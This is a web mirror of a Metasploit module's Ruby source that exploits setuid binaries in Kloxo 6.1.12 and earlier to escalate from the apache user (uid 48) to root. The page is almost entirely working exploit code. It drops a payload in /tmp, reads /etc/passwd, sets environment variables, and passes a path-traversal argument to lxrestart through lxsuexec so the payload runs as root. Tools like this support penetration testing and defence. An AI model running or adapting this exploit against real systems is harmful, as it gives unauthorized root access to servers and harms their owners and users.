Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/kloxo_lxsuexec.rb
33008 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Post::File

11
  include Msf::Exploit::FileDropper

12


13
  include Msf::Exploit::Local::Linux

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        {

20
          'Name' => 'Kloxo Local Privilege Escalation',

21
          'Description' => %q{

22
            Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as

23
            lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,

24
            Apache by default on CentOS 5.8, the operating system supported by Kloxo.

25
            This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.

26
          },

27
          'License' => MSF_LICENSE,

28
          'Author' => [

29
            'HTP', # Original PoC according to exploit-db

30
            'juan vazquez' # Metasploit module

31
          ],

32
          'Platform' => [ 'linux' ],

33
          'Arch' => [ ARCH_X86 ],

34
          'SessionTypes' => [ 'shell' ],

35
          'Payload' => {

36
            'Space' => 8000,

37
            'DisableNops' => true

38
          },

39
          'References' => [

40
            [ 'CVE', '2012-10022' ],

41
            [ 'EDB', '25406' ],

42
            [ 'OSVDB', '93287' ],

43
            [ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC

44
          ],

45
          'Targets' => [

46
            [ 'Kloxo 6.1.12', {} ]

47
          ],

48
          'DefaultOptions' => {

49
            'PrependSetuid' => true

50
          },

51
          'DefaultTarget' => 0,

52
          'Privileged' => true,

53
          'DisclosureDate' => '2012-09-18',

54
          'Notes' => {

55
            'Reliability' => UNKNOWN_RELIABILITY,

56
            'Stability' => UNKNOWN_STABILITY,

57
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
          }

59
        }

60
      )

61
    )

62
  end

63


64
  def exploit

65
    # apache uid (48) is needed in order to abuse the setuid lxsuexec binary

66
    # .text:0804869D                 call    _getuid

67
    # .text:080486A2                 cmp     eax, 48

68
    # .text:080486A5                 jz      short loc_80486B6 // uid == 48 (typically apache on CentOS)

69
    # .text:080486A7                 mov     [ebp+var_A4], 0Ah

70
    # .text:080486B1                 jmp     loc_8048B62 // finish if uid != 48

71
    # .text:08048B62 loc_8048B62:                           ; CODE XREF: main+39j

72
    # .text:08048B62                                         ; main+B0j

73
    # .text:08048B62                 mov     eax, [ebp+var_A4]

74
    # .text:08048B68                 add     esp, 0ECh

75
    # .text:08048B6E                 pop     ecx

76
    # .text:08048B6F                 pop     esi

77
    # .text:08048B70                 pop     edi

78
    # .text:08048B71                 pop     ebp

79
    # .text:08048B72                 lea     esp, [ecx-4]

80
    # .text:08048B75                 retn

81
    # .text:08048B75 main            endp

82
    print_status("Checking actual uid...")

83
    id = cmd_exec("id -u")

84
    if id != "48"

85
      fail_with(Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")

86
    end

87


88
    # Write msf payload to /tmp and give provide executable perms

89
    pl = generate_payload_exe

90
    payload_path = "/tmp/#{rand_text_alpha(4)}"

91
    print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")

92
    write_file(payload_path, pl)

93
    register_file_for_cleanup(payload_path)

94


95
    # Profit

96
    print_status("Exploiting...")

97
    cmd_exec("chmod +x #{payload_path}")

98
    cmd_exec("LXLABS=`grep lxlabs /etc/passwd | cut -d: -f3`")

99
    cmd_exec("export MUID=$LXLABS")

100
    cmd_exec("export GID=$LXLABS")

101
    cmd_exec("export TARGET=/bin/sh")

102
    cmd_exec("export CHECK_GID=0")

103
    cmd_exec("export NON_RESIDENT=1")

104
    helper_path = "/tmp/#{rand_text_alpha(4)}"

105
    write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")

106
    register_file_for_cleanup(helper_path)

107
    cmd_exec("lxsuexec #{helper_path}")

108
  end

109
end

110


111